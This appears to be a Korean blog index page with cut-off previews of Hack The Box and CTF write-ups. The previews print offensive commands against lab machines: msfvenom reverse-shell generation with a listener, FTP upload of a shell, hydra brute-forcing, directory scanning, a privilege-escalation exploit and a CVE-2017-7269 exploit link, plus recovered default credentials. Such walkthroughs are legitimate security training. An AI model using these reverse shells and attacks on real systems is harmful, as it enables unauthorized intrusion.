전체 글
-
[HTB] Devel WriteupWargame/Hack The Box 2022. 2. 3. 21:32
nmap -sC -sS -sV -O -p- -o scanResultFull.txt 10.129.150.253 ftp에 anonymous 계정으로 접근 가능하므로 리버스쉘을 업로드 하자. msfvenom -p windows/shell_reverse_tcp LHOST="10.10.14.114" LPORT=1234 -f aspx > reverseShell.aspx ftp put reverseShell.aspx nc -nvlp 1234 권한 상승을 위해 systeminfo 정보 저장 후 wes.py를 통해 유효한 취약점을 찾아보았다. python3 wes.py systeminfo.txt -i "priv" 그 중 40564.c를 활용하기로 했으며 문서에 안내되어있는대로 컴파일을 했다. i686-w64-mingw3..
-
[HTB] Valentine WriteupWargame/Hack The Box 2022. 1. 29. 23:19
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.182.216 nmap -O -sU -p- -o scanResultUdp.txt 10.129.182.216 nmap -sC -sS -sV -O -F 10.129.182.216 dirb, niko를 통해 활성화 되어있는 웹서비스에서 취약점이 존재하는지 찾아보았다. dirb http://10.129.182.216/ -o dirbResult.txt nikto -h 10.129.182.216 -p 80 -output niktoResult.txt /dev/ 파라미터에 접근해보니 hype_key, notes.txt 파일이 있었다. 그 중 hype_key 파일의 내용은 아래와 같았다. 2d 2d 2d 2d 2d 42 45 47 4..
-
[HTB] Grandpa WriteupWargame/Hack The Box 2022. 1. 27. 19:38
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.95.233 I활성화 되어있는 80포트에서 IS httpd 6.0 서비스를 사용중인걸 알 수 있었고, 접근해보니 아래와 같은 페이지가 나타났다. IIS 6.0 exploit 등 키워드로 검색 결과 아래 레퍼런스를 얻을 수 있었고, 리버스 쉘을 획득하는데 성공했다. https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell GitHub - g0rx/iis6-exploit-2017-CVE-2017-7269: iis6 exploit 2017 CVE-2017-7269 iis6 exploit 2017 CVE-2017-7269..
-
[Study] Real World CTF 4th Hack into Skynet WriteupCTF/Real World CTF 4th 2022. 1. 24. 21:02
주어진 페이지에 접근해보자. 다음과 같은 로그인페이지가 나타난다. 취약점을 찾기 위해 주어진 소스코드를 분석해보자. #!/usr/bin/env python3 import flask import psycopg2 import datetime import hashlib from skynet import Skynet app = flask.Flask(__name__, static_url_path='') skynet = Skynet() def skynet_detect(): req = { 'method': flask.request.method, 'path': flask.request.full_path, 'host': flask.request.headers.get('host'), 'content_type': flask..
-
[HTB] Nibbles WriteupWargame/Hack The Box 2022. 1. 23. 21:12
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.180.107 80포트로 접근해보니 아래와 같은 페이지가 안내되었고, /nibbleblog/ 디렉토리에는 다음과같은 블로그페이지가 있었다. 경로에 /admin~ 이 존재하는 것을 보고 접근해보니 디렉토리인덱싱이 발생하는것을 확인 할 수있었다. 또한, 별도의 admin.php 페이지가 존재했다. hydra tool을 활용하여 관리자 계정에 대해 Bruteforce 공격을 해보았지만, 반복횟수에 따른 제한이 있는지 접근이 제한되어버렸다. hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.129.182.134 http-post-form "/nibbleblog/admin.php:..
-
[HTB] Jerry WriteupWargame/Hack The Box 2022. 1. 22. 21:32
공격 대상에 대한 정보를 획득하기 위해 포트스캐닝을 수행해보자. nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.1.110 유일하게 열려있는 8080 포트에 접근해보니, Apache Tomcat 디폴트 페이지가 나왔다. 관리자 페이지의 디폴트 주소인 /manager 에 접근해보니 계정 정보를 요구했다. 기본 관리자 계정 정보인 admin / admin 으로 로그인 하니, 아래와 같은 페이지가 나타났고, manager-gui의 계정 정보를 확인 할 수 있었다. ( tomcat / s3cret ) 다시 로그인 하면 아래와같은 gui 관리자 페이지가 나타난다. 관리자는 war 파일을 통해 업로드를 할 수 있으므로, war형식의 리버스 쉘 파일을 생성했다. msfvenom..
-
[HTB] Arctic WriteupWargame/Hack The Box 2022. 1. 19. 06:58
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.177.205 처음에는 msrpc 위주로 삽질을 해봤지만 큰 성과가 없었다. 8500포트에 대해서는 확실한정보가 주어지지 않았길래, 웹 브라우저를 통해 접근해보았다. 아래와 같은 페이지가 나타났다.(userfiles 디렉토리는 공격 이후 공격으로 인해 생성된 디렉토리이다.) 차근차근 디렉토리들을 탐색해 봤더니(요청하나당 10초이상 걸려서 힘들었다ㅠ) 아래와같은 페이지를 발견할수있었다. ADOBE coldfusion 8 서비스라는 것을 알게되었으니 활용할만한 취약점이 있나 확인해보았다. searchsploit coldfusion 8 RCE 공격이 가능한 exploit 코드가 있길래, 이를 활용해보기로 했다. search..
-
[HTB] Sense WriteupWargame/Hack The Box 2022. 1. 17. 17:57
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.255.245 443 port 에 lighttpd 서비스로 웹페이지가 활성화되어있는것을 알 수 있었다. dirb, gobuster 등을 활용하여 웹페이지의 취약 포인트를 찾아보았다. gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.129.255.245 -x php,txt,conf -o bigList /system-users.txt 에서 계정정보로 추정되는 값을 확인 할 수 있었다. password는 디폴트 값이므로 구글링 결과 pfsense 임을 알 수 있었다. 따라서, rohit / pfsense ..